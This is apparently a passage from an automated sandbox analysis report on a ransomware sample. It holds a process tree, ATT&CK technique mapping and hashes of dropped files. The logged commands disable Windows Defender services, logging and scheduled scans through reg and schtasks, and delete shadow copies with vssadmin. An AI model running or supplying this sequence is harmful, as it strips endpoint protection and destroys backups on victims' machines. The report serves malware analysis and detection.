        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
        9⤵
        
        PID:1876
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
        9⤵
        
        PID:3404
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
        9⤵
        
        PID:920
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:3492
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
        9⤵
        
        PID:4664
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
        9⤵
        
        PID:1332
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
        9⤵
        
        PID:3640
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
        9⤵
        
        PID:4304
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
        9⤵
        
        PID:1480
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
        9⤵
        
        PID:2384
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
        9⤵
        
        PID:1592
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
        9⤵
        
        PID:3144
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
        9⤵
        
        PID:4092
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
        9⤵
        
        PID:212
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
        9⤵
        
        PID:2780
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
        9⤵
        
        PID:3412
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
        9⤵
        
        PID:228
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
        9⤵
        
        PID:2776
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
        9⤵
        
        PID:2796
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
        9⤵
        
        PID:4892
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
        9⤵
        Modifies security service
        
        PID:3500
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /k C:\configuration\run.bat
        9⤵
        
        PID:3564
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\configuration\run.bat" MY_FLAG
        10⤵
        
        PID:3752
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo j "
        11⤵
        
        PID:4720
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1
        11⤵
        
        PID:2096
        
        C:\configuration\Ransomware.exe
        
        Ransomware.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Sets desktop wallpaper using registry
        Modifies Control Panel
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:4904
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C chcp 65001 && vssadmin delete shadows /all /quiet
        8⤵
        
        PID:3968
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        9⤵
        
        PID:4820

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:3864

C:\Users\Admin\AppData\Local\ServiceHub\Ransomware.exe
C:\Users\Admin\AppData\Local\ServiceHub\Ransomware.exe
1⤵
- Executes dropped EXE
PID:3692

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\102050D9-8E00-46D4-AA76-5F5657672563\CbsProvider.dll

Filesize
875KB

MD5
6ad0376a375e747e66f29fb7877da7d0

SHA1
a0de5966453ff2c899f00f165bbff50214b5ea39

SHA256
4c9a4ab6596626482dd2190034fcb3fafebe88a961423962ad577e873ef5008f

SHA512
8a97b2cc96ec975188e53e428d0fc2c562f4c3493d3c354e316c7f89a0bd25c84246807c9977f0afdda3291b8c23d518a36fd967d8f9d4d2ce7b0af11b96eb18

Download Submit
C:\Users\Admin\AppData\Local\Temp\102050D9-8E00-46D4-AA76-5F5657672563\DismCorePS.dll

Filesize
183KB

MD5
a033f16836d6f8acbe3b27b614b51453

SHA1
716297072897aea3ec985640793d2cdcbf996cf9

SHA256
e3b3a4c9c6403cb8b0aa12d34915b67e4eaa5bb911e102cf77033aa315d66a1e

SHA512
ad5b641d93ad35b3c7a3b56cdf576750d1ad4c63e2a16006739888f0702280cad57dd0a6553ef426111c04ceafd6d1e87f6e7486a171fff77f243311aee83871

Download Submit
C:\Users\Admin\AppData\Local\Temp\102050D9-8E00-46D4-AA76-5F5657672563\DismCorePS.dll

Filesize
183KB

MD5
a033f16836d6f8acbe3b27b614b51453

SHA1
716297072897aea3ec985640793d2cdcbf996cf9

SHA256
e3b3a4c9c6403cb8b0aa12d34915b67e4eaa5bb911e102cf77033aa315d66a1e

SHA512
ad5b641d93ad35b3c7a3b56cdf576750d1ad4c63e2a16006739888f0702280cad57dd0a6553ef426111c04ceafd6d1e87f6e7486a171fff77f243311aee83871

Download Submit
C:\Users\Admin\AppData\Local\Temp\102050D9-8E00-46D4-AA76-5F5657672563\DismHost.exe

Filesize
142KB

MD5
e5d5e9c1f65b8ec7aa5b7f1b1acdd731

SHA1
dbb14dcda6502ab1d23a7c77d405dafbcbeb439e

SHA256
e30508e2088bc16b2a84233ced64995f738deaef2366ac6c86b35c93bbcd9d80

SHA512
7cf80d4a16c5dbbf61fcb22ebe30cf78ca42a030b7d7b4ad017f28fba2c9b111e8cf5b3064621453a44869bbaed124d6fb1e8d2c8fe8202f1e47579d874fa4bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\102050D9-8E00-46D4-AA76-5F5657672563\DismProv.dll

Filesize
255KB

MD5
490be3119ea17fa29329e77b7e416e80

SHA1
c71191c3415c98b7d9c9bbcf1005ce6a813221da

SHA256
ef1e263e1bcc05d9538cb9469dd7dba5093956aa325479c3d2607168cc1c000a

SHA512
6339b030008b7d009d36abf0f9595da9b793264ebdce156d4a330d095a5d7602ba074075ea05fef3dde474fc1d8e778480429de308c121df0bf3075177f26f13

Download Submit
C:\Users\Admin\AppData\Local\Temp\102050D9-8E00-46D4-AA76-5F5657672563\LogProvider.dll

Filesize
77KB

MD5
815a4e7a7342224a239232f2c788d7c0

SHA1
430b7526d864cfbd727b75738197230d148de21a

SHA256
a9c8787c79a952779eca82e7389cf5bbde7556e4491b8bfcfd6617740ac7d8a2

SHA512
0c19d1e388ed0855a660135dec7a5e6b72ecbb7eb67ff94000f2399bd07df431be538055a61cfb2937319a0ce060898bb9b6996765117b5acda8fc0bad47a349

Download Submit
C:\Users\Admin\AppData\Local\Temp\102050D9-8E00-46D4-AA76-5F5657672563\LogProvider.dll

Filesize
77KB

MD5
815a4e7a7342224a239232f2c788d7c0

SHA1
430b7526d864cfbd727b75738197230d148de21a

SHA256
a9c8787c79a952779eca82e7389cf5bbde7556e4491b8bfcfd6617740ac7d8a2

SHA512
0c19d1e388ed0855a660135dec7a5e6b72ecbb7eb67ff94000f2399bd07df431be538055a61cfb2937319a0ce060898bb9b6996765117b5acda8fc0bad47a349

Download Submit
C:\Users\Admin\AppData\Local\Temp\102050D9-8E00-46D4-AA76-5F5657672563\OSProvider.dll

Filesize
149KB

MD5
db4c3a07a1d3a45af53a4cf44ed550ad

SHA1
5dea737faadf0422c94f8f50e9588033d53d13b3

SHA256
2165d567aa47264abe2a866bb1bcb01a1455a75a6ea530b1b9a4dda54d08f758

SHA512
5182b80459447f3c1fb63b70ad0370e1da26828a7f73083bec0af875b37888dd12ec5a6d9dc84157fc5b535f473ad7019eb6a53b9a47a2e64e6a8b7fae4cddde

Download Submit
C:\Users\Admin\AppData\Local\Temp\102050D9-8E00-46D4-AA76-5F5657672563\OSProvider.dll

Filesize
149KB

MD5
db4c3a07a1d3a45af53a4cf44ed550ad

SHA1
5dea737faadf0422c94f8f50e9588033d53d13b3

SHA256
2165d567aa47264abe2a866bb1bcb01a1455a75a6ea530b1b9a4dda54d08f758

SHA512
5182b80459447f3c1fb63b70ad0370e1da26828a7f73083bec0af875b37888dd12ec5a6d9dc84157fc5b535f473ad7019eb6a53b9a47a2e64e6a8b7fae4cddde

Download Submit
C:\Users\Admin\AppData\Local\Temp\102050D9-8E00-46D4-AA76-5F5657672563\dismprov.dll

Filesize
255KB

MD5
490be3119ea17fa29329e77b7e416e80

SHA1
c71191c3415c98b7d9c9bbcf1005ce6a813221da

SHA256
ef1e263e1bcc05d9538cb9469dd7dba5093956aa325479c3d2607168cc1c000a

SHA512
6339b030008b7d009d36abf0f9595da9b793264ebdce156d4a330d095a5d7602ba074075ea05fef3dde474fc1d8e778480429de308c121df0bf3075177f26f13

Download Submit
C:\Users\Admin\AppData\Local\Temp\498AAE07-20B9-46A5-8154-830489F0E240\DismHost.exe

Filesize
142KB

MD5
e5d5e9c1f65b8ec7aa5b7f1b1acdd731

SHA1
dbb14dcda6502ab1d23a7c77d405dafbcbeb439e

SHA256
e30508e2088bc16b2a84233ced64995f738deaef2366ac6c86b35c93bbcd9d80

SHA512
7cf80d4a16c5dbbf61fcb22ebe30cf78ca42a030b7d7b4ad017f28fba2c9b111e8cf5b3064621453a44869bbaed124d6fb1e8d2c8fe8202f1e47579d874fa4bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\5191A999-7603-4F18-8C64-515FE274E3DA\AppxProvider.dll

Filesize
554KB

MD5
a7927846f2bd5e6ab6159fbe762990b1

SHA1
8e3b40c0783cc88765bbc02ccc781960e4592f3f

SHA256
913f97dd219eeb7d5f7534361037fe1ecc3a637eb48d67b1c8afa8b5f951ba2f

SHA512
1eafece2f6aa881193e6374b81d7a7c8555346756ed53b11ca1678f1f3ffb70ae3dea0a30c5a0aab8be45db9c31d78f30f026bb22a7519a0930483d50507243f

Download Submit
C:\Users\Admin\AppData\Local\Temp\5191A999-7603-4F18-8C64-515FE274E3DA\AssocProvider.dll

Filesize
112KB

MD5
94dc379aa020d365ea5a32c4fab7f6a3

SHA1
7270573fd7df3f3c996a772f85915e5982ad30a1

SHA256
dc6a5930c2b9a11204d2e22a3e8d14c28e5bdac548548e256ba7ffa79bd8c907

SHA512
998fd10a1f43024a2398491e3764748c0b990b37d8b3c820d281296f8da8f1a2f97073f4fd83543994a6e326fa7e299cb5f59e609358cd77af996175782eeaca

Download Submit
C:\Users\Admin\AppData\Local\Temp\5191A999-7603-4F18-8C64-515FE274E3DA\CbsProvider.dll

Filesize
875KB

MD5
6ad0376a375e747e66f29fb7877da7d0

SHA1
a0de5966453ff2c899f00f165bbff50214b5ea39

SHA256
4c9a4ab6596626482dd2190034fcb3fafebe88a961423962ad577e873ef5008f

SHA512
8a97b2cc96ec975188e53e428d0fc2c562f4c3493d3c354e316c7f89a0bd25c84246807c9977f0afdda3291b8c23d518a36fd967d8f9d4d2ce7b0af11b96eb18

Download Submit
C:\Users\Admin\AppData\Local\Temp\5191A999-7603-4F18-8C64-515FE274E3DA\CbsProvider.dll

Filesize
875KB

MD5
6ad0376a375e747e66f29fb7877da7d0

SHA1
a0de5966453ff2c899f00f165bbff50214b5ea39

SHA256
4c9a4ab6596626482dd2190034fcb3fafebe88a961423962ad577e873ef5008f

SHA512
8a97b2cc96ec975188e53e428d0fc2c562f4c3493d3c354e316c7f89a0bd25c84246807c9977f0afdda3291b8c23d518a36fd967d8f9d4d2ce7b0af11b96eb18

Download Submit
C:\Users\Admin\AppData\Local\Temp\5191A999-7603-4F18-8C64-515FE274E3DA\DismCore.dll

Filesize
402KB

MD5
b1f793773dc727b4af1648d6d61f5602

SHA1
be7ed4e121c39989f2fb343558171ef8b5f7af68

SHA256
af7f342adf5b533ea6978b68064f39bfb1e4ad3b572ae1b7f2287f5533334d4e

SHA512
66a92bff5869a56a7931d7ed9881d79c22ba741c55fb42c11364f037e1ec99902db2679b67a7e60cbf760740d5b47dcf1a6dcfae5ad6711a0bd7f086cc054eed

Download Submit
C:\Users\Admin\AppData\Local\Temp\5191A999-7603-4F18-8C64-515FE274E3DA\DismCorePS.dll

Filesize
183KB

MD5
a033f16836d6f8acbe3b27b614b51453

SHA1
716297072897aea3ec985640793d2cdcbf996cf9

SHA256
e3b3a4c9c6403cb8b0aa12d34915b67e4eaa5bb911e102cf77033aa315d66a1e

SHA512
ad5b641d93ad35b3c7a3b56cdf576750d1ad4c63e2a16006739888f0702280cad57dd0a6553ef426111c04ceafd6d1e87f6e7486a171fff77f243311aee83871

Download Submit
C:\Users\Admin\AppData\Local\Temp\5191A999-7603-4F18-8C64-515FE274E3DA\DismCorePS.dll

Filesize
183KB

MD5
a033f16836d6f8acbe3b27b614b51453

SHA1
716297072897aea3ec985640793d2cdcbf996cf9

SHA256
e3b3a4c9c6403cb8b0aa12d34915b67e4eaa5bb911e102cf77033aa315d66a1e

SHA512
ad5b641d93ad35b3c7a3b56cdf576750d1ad4c63e2a16006739888f0702280cad57dd0a6553ef426111c04ceafd6d1e87f6e7486a171fff77f243311aee83871

Download Submit
C:\Users\Admin\AppData\Local\Temp\5191A999-7603-4F18-8C64-515FE274E3DA\DismHost.exe

Filesize
142KB

MD5
e5d5e9c1f65b8ec7aa5b7f1b1acdd731

SHA1
dbb14dcda6502ab1d23a7c77d405dafbcbeb439e

SHA256
e30508e2088bc16b2a84233ced64995f738deaef2366ac6c86b35c93bbcd9d80

SHA512
7cf80d4a16c5dbbf61fcb22ebe30cf78ca42a030b7d7b4ad017f28fba2c9b111e8cf5b3064621453a44869bbaed124d6fb1e8d2c8fe8202f1e47579d874fa4bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\5191A999-7603-4F18-8C64-515FE274E3DA\DismProv.dll

Filesize
255KB

MD5
490be3119ea17fa29329e77b7e416e80

SHA1
c71191c3415c98b7d9c9bbcf1005ce6a813221da

SHA256
ef1e263e1bcc05d9538cb9469dd7dba5093956aa325479c3d2607168cc1c000a

SHA512
6339b030008b7d009d36abf0f9595da9b793264ebdce156d4a330d095a5d7602ba074075ea05fef3dde474fc1d8e778480429de308c121df0bf3075177f26f13

Download Submit
C:\Users\Admin\AppData\Local\Temp\5191A999-7603-4F18-8C64-515FE274E3DA\DmiProvider.dll

Filesize
415KB

MD5
ea8488990b95ce4ef6b4e210e0d963b2

SHA1
cd8bf723aa9690b8ca9a0215321e8148626a27d1

SHA256
04f851b9d5e58ed002ad768bdcc475f22905fb1dab8341e9b3128df6eaa25b98

SHA512
56562131cbe5f0ea5a2508f5bfed88f21413526f1539fe4864ece5b0e03a18513f3db33c07e7abd7b8aaffc34a7587952b96bb9990d9f4efa886f613d95a5b1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\5191A999-7603-4F18-8C64-515FE274E3DA\FfuProvider.dll

Filesize
619KB

MD5
df785c5e4aacaee3bd16642d91492815

SHA1
286330d2ab07512e1f636b90613afcd6529ada1e

SHA256
56cc8d139be12e969fff3bbf47b1f5c62c3db887e3fb97c79cf7d285076f9271

SHA512
3566de60fe76b63940cff3579da94f404c0bc713f2476ba00b9de12dc47973c7c22d5eed1fd667d20cea29b3c3c4fa648e5f44667e8369c192a4b69046e6f745

Download Submit
C:\Users\Admin\AppData\Local\Temp\5191A999-7603-4F18-8C64-515FE274E3DA\FolderProvider.dll

Filesize
59KB

MD5
4f3250ecb7a170a5eb18295aa768702d

SHA1
70eb14976ddab023f85bc778621ade1d4b5f4d9d

SHA256
a235317ab7ed89e6530844a78b933d50f6f48ea5df481de158eb99dd8c4ba461

SHA512
e9ce6cced5029d931d82e78e7e609a892bfe239096b55062b78e8ff38cce34ce6dd4e91efb41c4cd6ecf6017d098e4c9b13d6cb4408d761051468ee7f74bc569

Download Submit
C:\Users\Admin\AppData\Local\Temp\5191A999-7603-4F18-8C64-515FE274E3DA\GenericProvider.dll

Filesize
149KB

MD5
ef7e2760c0a24453fc78359aea3d7869

SHA1
0ea67f1fd29df2615da43e023e86046e8e46e2e1

SHA256
d39f38402a9309ddd1cba67be470ede348f2bc1bab2f8d565e8f15510761087a

SHA512
be785ba6b564cc4e755b4044ae27f916c009b7d942fcd092aed2ae630b1704e8a2f8b4692648eed481a5eb5355fd2e1ef7f94f6fb519b7e1ff6fc3c5f1aaa06f

Download Submit
C:\Users\Admin\AppData\Local\Temp\5191A999-7603-4F18-8C64-515FE274E3DA\LogProvider.dll

Filesize
77KB

MD5
815a4e7a7342224a239232f2c788d7c0

SHA1
430b7526d864cfbd727b75738197230d148de21a

SHA256
a9c8787c79a952779eca82e7389cf5bbde7556e4491b8bfcfd6617740ac7d8a2

SHA512
0c19d1e388ed0855a660135dec7a5e6b72ecbb7eb67ff94000f2399bd07df431be538055a61cfb2937319a0ce060898bb9b6996765117b5acda8fc0bad47a349

Download Submit
C:\Users\Admin\AppData\Local\Temp\5191A999-7603-4F18-8C64-515FE274E3DA\LogProvider.dll

Filesize
77KB

MD5
815a4e7a7342224a239232f2c788d7c0

SHA1
430b7526d864cfbd727b75738197230d148de21a

SHA256
a9c8787c79a952779eca82e7389cf5bbde7556e4491b8bfcfd6617740ac7d8a2

SHA512
0c19d1e388ed0855a660135dec7a5e6b72ecbb7eb67ff94000f2399bd07df431be538055a61cfb2937319a0ce060898bb9b6996765117b5acda8fc0bad47a349

Download Submit
C:\Users\Admin\AppData\Local\Temp\5191A999-7603-4F18-8C64-515FE274E3DA\OSProvider.dll

Filesize
149KB

MD5
db4c3a07a1d3a45af53a4cf44ed550ad

SHA1
5dea737faadf0422c94f8f50e9588033d53d13b3

SHA256
2165d567aa47264abe2a866bb1bcb01a1455a75a6ea530b1b9a4dda54d08f758

SHA512
5182b80459447f3c1fb63b70ad0370e1da26828a7f73083bec0af875b37888dd12ec5a6d9dc84157fc5b535f473ad7019eb6a53b9a47a2e64e6a8b7fae4cddde

Download Submit
C:\Users\Admin\AppData\Local\Temp\5191A999-7603-4F18-8C64-515FE274E3DA\OSProvider.dll

Filesize
149KB

MD5
db4c3a07a1d3a45af53a4cf44ed550ad

SHA1
5dea737faadf0422c94f8f50e9588033d53d13b3

SHA256
2165d567aa47264abe2a866bb1bcb01a1455a75a6ea530b1b9a4dda54d08f758

SHA512
5182b80459447f3c1fb63b70ad0370e1da26828a7f73083bec0af875b37888dd12ec5a6d9dc84157fc5b535f473ad7019eb6a53b9a47a2e64e6a8b7fae4cddde

Download Submit
C:\Users\Admin\AppData\Local\Temp\5191A999-7603-4F18-8C64-515FE274E3DA\dismprov.dll

Filesize
255KB

MD5
490be3119ea17fa29329e77b7e416e80

SHA1
c71191c3415c98b7d9c9bbcf1005ce6a813221da

SHA256
ef1e263e1bcc05d9538cb9469dd7dba5093956aa325479c3d2607168cc1c000a

SHA512
6339b030008b7d009d36abf0f9595da9b793264ebdce156d4a330d095a5d7602ba074075ea05fef3dde474fc1d8e778480429de308c121df0bf3075177f26f13

Download Submit
C:\Users\Admin\AppData\Local\Temp\5191A999-7603-4F18-8C64-515FE274E3DA\en-US\AppxProvider.dll.mui

Filesize
22KB

MD5
bd0dd9c5a602cb0ad7eabc16b3c1abfc

SHA1
cede6e6a55d972c22da4bc9e0389759690e6b37f

SHA256
8af0073f8a023f55866e48bf3b902dfa7f41c51b0e8b0fe06f8c496d41f9a7b3

SHA512
86351dc31118fc5a12fad6f549aa60c45ebe92b3ce5b90376e41f60d6d168a8a9f6c35320fc2cdcc750e67a5751651657fe64cf42690943500afd0d1dae2cd0c

Download Submit
C:\Users\Admin\AppData\Local\Temp\5191A999-7603-4F18-8C64-515FE274E3DA\en-US\AssocProvider.dll.mui

Filesize
8KB

MD5
8833761572f0964bdc1bea6e1667f458

SHA1
166260a12c3399a9aa298932862569756b4ecc45

SHA256
b18c6ce1558c9ef6942a3bce246a46557c2a7d12aec6c4a07e4fa84dd5c422f5

SHA512
2a907354ec9a1920b9d1d2aeb9ff7c7314854b36a27f7d88aca17825e74a87413dbe7d1c3fde6a2410b5934f8c80a76f8bb6b7f12e7cfc643ce6622ca516d9b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\5191A999-7603-4F18-8C64-515FE274E3DA\en-US\CbsProvider.dll.mui

Filesize
53KB

MD5
6c51a3187d2464c48cc8550b141e25c5

SHA1
a42e5ae0a3090b5ab4376058e506b111405d5508

SHA256
d7a0253d6586e7bbfb0acb6facd9a326b32ba1642b458f5b5ed27feccb4fc199

SHA512
87a9e997d55bc6dbd05af1291fb78cd02266641d018ccfeb6826cb0de205aaf8a57b49e587462dbb6df2b86b54f91c0c5d3f87e64d7dbb2aea75ef143c5447ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\5191A999-7603-4F18-8C64-515FE274E3DA\en-US\DismCore.dll.mui

Filesize
7KB

MD5
7a15f6e845f0679de593c5896fe171f9

SHA1
0c923dfaffb56b56cba0c28a4eacb66b1b91a1f4

SHA256
f91e3c35b472f95d7b1ae3dc83f9d6bfde33515aa29e8b310f55d9fe66466419

SHA512
5a0373f1fb076a0059cac8f30fe415e06ed880795f84283911bec75de0977baf52432b740b429496999cedf5cca45efd6ef010700e2d9a1887438056c8c573ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\5191A999-7603-4F18-8C64-515FE274E3DA\en-US\DmiProvider.dll.mui

Filesize
17KB

MD5
b7252234aa43b7295bb62336adc1b85c

SHA1
b2c42a5af79530e7cf9bcf54fd76ae9d5f234d7f

SHA256
73709c25dc5300a435e53df97fc01a7dc184b56796cae48ee728d54d26076d6c

SHA512
88241009b342eb1205b10f7725a7cb1ec2c7135606459d038c4b8847efd9d5e0ad4749621f8df93746dd3ba8ab92d1b0f513ed10e2ba712a7991716f4c062358

Download Submit
C:\Users\Admin\AppData\Local\Temp\5191A999-7603-4F18-8C64-515FE274E3DA\en-US\FfuProvider.dll.mui

Filesize
9KB

MD5
dc826a9cb121e2142b670d0b10022e22

SHA1
b2fe459ede8ba99602ae6ea5fa24f0133cca2bc9

SHA256
ba6695148f96a5d45224324006ae29becfd2a6aa1de947e27371a4eb84e7451a

SHA512
038e9abff445848c882a71836574df0394e73690bc72642c2aa949c1ad820c5cbb4dedc4ee7b5b75fd5ac8a43813d416f23d28973de7a7f0e5c3f7112da6fe1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\5191A999-7603-4F18-8C64-515FE274E3DA\en-US\FolderProvider.dll.mui

Filesize
2KB

MD5
22b4a3a1ec3b6d7aa3bc61d0812dc85f

SHA1
97ae3504a29eb555632d124022d8406fc5b6f662

SHA256
c81a992ecebd9260ff34e41383aaca1c64a9fa4706a4744ac814f0f5daa1e105

SHA512
9329b60a60c45b2486000ed0aff8d260fdac3d0a8789823eaa015eab1a6d577012f9d12502f81bad9902e41545c3c3e77f434bc1a753b4f8430d01db2cdbe26c

Download Submit
C:\Users\Admin\AppData\Local\Temp\5191A999-7603-4F18-8C64-515FE274E3DA\en-US\dismprov.dll.mui

Filesize
2KB

MD5
7d06108999cc83eb3a23eadcebb547a5

SHA1
200866d87a490d17f6f8b17b26225afeb6d39446

SHA256
cf8cc85cdd12cf4a02df5274f8d0cdc625c6409fe80866b3052b7d5a862ac311

SHA512
9f024aa89392fbbbabe62a58857e5ad5250e05f23d7f78fc9a09f535463446796dd6e37aab5e38dfc0bf5b15533844f63b3bddcb5cb9335901e099f65f9d8002

Download Submit
C:\Users\Admin\AppData\Local\Temp\63DF.tmp\63F0.tmp\63F1.bat

Filesize
1KB

MD5
26e31166f37bc5ced3f4bcac118c69a8

SHA1
b81d68da35779e2531c13bdcdfd6564d72999223

SHA256
ddcbf8a6cdbf5dc2aa1280b20e014c4b3412ddac9b979cacf331a559585c3dc2

SHA512
4aa9e8fb0b9d0c5698f4abd060c0f3b253bf5a23d3456e675ee2a05a0ebe1c47ac5960ca1ce913a28dfc6859370e0305ff86f20645d2188271c7c347e90ef836

Download Submit
C:\Users\Admin\AppData\Local\Temp\649B.tmp\649C.tmp\64AC.bat

Filesize
1KB

MD5
26e31166f37bc5ced3f4bcac118c69a8

SHA1
b81d68da35779e2531c13bdcdfd6564d72999223

SHA256
ddcbf8a6cdbf5dc2aa1280b20e014c4b3412ddac9b979cacf331a559585c3dc2

SHA512
4aa9e8fb0b9d0c5698f4abd060c0f3b253bf5a23d3456e675ee2a05a0ebe1c47ac5960ca1ce913a28dfc6859370e0305ff86f20645d2188271c7c347e90ef836

Download Submit
C:\Users\Admin\AppData\Local\Temp\C3DDCEE5-1943-4C63-85B8-14A4DA41626D\CbsProvider.dll

Filesize
875KB

MD5
6ad0376a375e747e66f29fb7877da7d0

SHA1
a0de5966453ff2c899f00f165bbff50214b5ea39

SHA256
4c9a4ab6596626482dd2190034fcb3fafebe88a961423962ad577e873ef5008f

SHA512
8a97b2cc96ec975188e53e428d0fc2c562f4c3493d3c354e316c7f89a0bd25c84246807c9977f0afdda3291b8c23d518a36fd967d8f9d4d2ce7b0af11b96eb18

Download Submit
C:\Users\Admin\AppData\Local\Temp\C3DDCEE5-1943-4C63-85B8-14A4DA41626D\DismCorePS.dll

Filesize
183KB

MD5
a033f16836d6f8acbe3b27b614b51453

SHA1
716297072897aea3ec985640793d2cdcbf996cf9

SHA256
e3b3a4c9c6403cb8b0aa12d34915b67e4eaa5bb911e102cf77033aa315d66a1e

SHA512
ad5b641d93ad35b3c7a3b56cdf576750d1ad4c63e2a16006739888f0702280cad57dd0a6553ef426111c04ceafd6d1e87f6e7486a171fff77f243311aee83871

Download Submit
C:\Users\Admin\AppData\Local\Temp\C3DDCEE5-1943-4C63-85B8-14A4DA41626D\DismCorePS.dll

Filesize
183KB

MD5
a033f16836d6f8acbe3b27b614b51453

SHA1
716297072897aea3ec985640793d2cdcbf996cf9

SHA256
e3b3a4c9c6403cb8b0aa12d34915b67e4eaa5bb911e102cf77033aa315d66a1e

SHA512
ad5b641d93ad35b3c7a3b56cdf576750d1ad4c63e2a16006739888f0702280cad57dd0a6553ef426111c04ceafd6d1e87f6e7486a171fff77f243311aee83871

Download Submit
C:\Users\Admin\AppData\Local\Temp\C3DDCEE5-1943-4C63-85B8-14A4DA41626D\DismHost.exe

Filesize
142KB

MD5
e5d5e9c1f65b8ec7aa5b7f1b1acdd731

SHA1
dbb14dcda6502ab1d23a7c77d405dafbcbeb439e

SHA256
e30508e2088bc16b2a84233ced64995f738deaef2366ac6c86b35c93bbcd9d80

SHA512
7cf80d4a16c5dbbf61fcb22ebe30cf78ca42a030b7d7b4ad017f28fba2c9b111e8cf5b3064621453a44869bbaed124d6fb1e8d2c8fe8202f1e47579d874fa4bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\C3DDCEE5-1943-4C63-85B8-14A4DA41626D\DismProv.dll

Filesize
255KB

MD5
490be3119ea17fa29329e77b7e416e80

SHA1
c71191c3415c98b7d9c9bbcf1005ce6a813221da

SHA256
ef1e263e1bcc05d9538cb9469dd7dba5093956aa325479c3d2607168cc1c000a

SHA512
6339b030008b7d009d36abf0f9595da9b793264ebdce156d4a330d095a5d7602ba074075ea05fef3dde474fc1d8e778480429de308c121df0bf3075177f26f13

Download Submit
C:\Users\Admin\AppData\Local\Temp\C3DDCEE5-1943-4C63-85B8-14A4DA41626D\LogProvider.dll

Filesize
77KB

MD5
815a4e7a7342224a239232f2c788d7c0

SHA1
430b7526d864cfbd727b75738197230d148de21a

SHA256
a9c8787c79a952779eca82e7389cf5bbde7556e4491b8bfcfd6617740ac7d8a2

SHA512
0c19d1e388ed0855a660135dec7a5e6b72ecbb7eb67ff94000f2399bd07df431be538055a61cfb2937319a0ce060898bb9b6996765117b5acda8fc0bad47a349

Download Submit
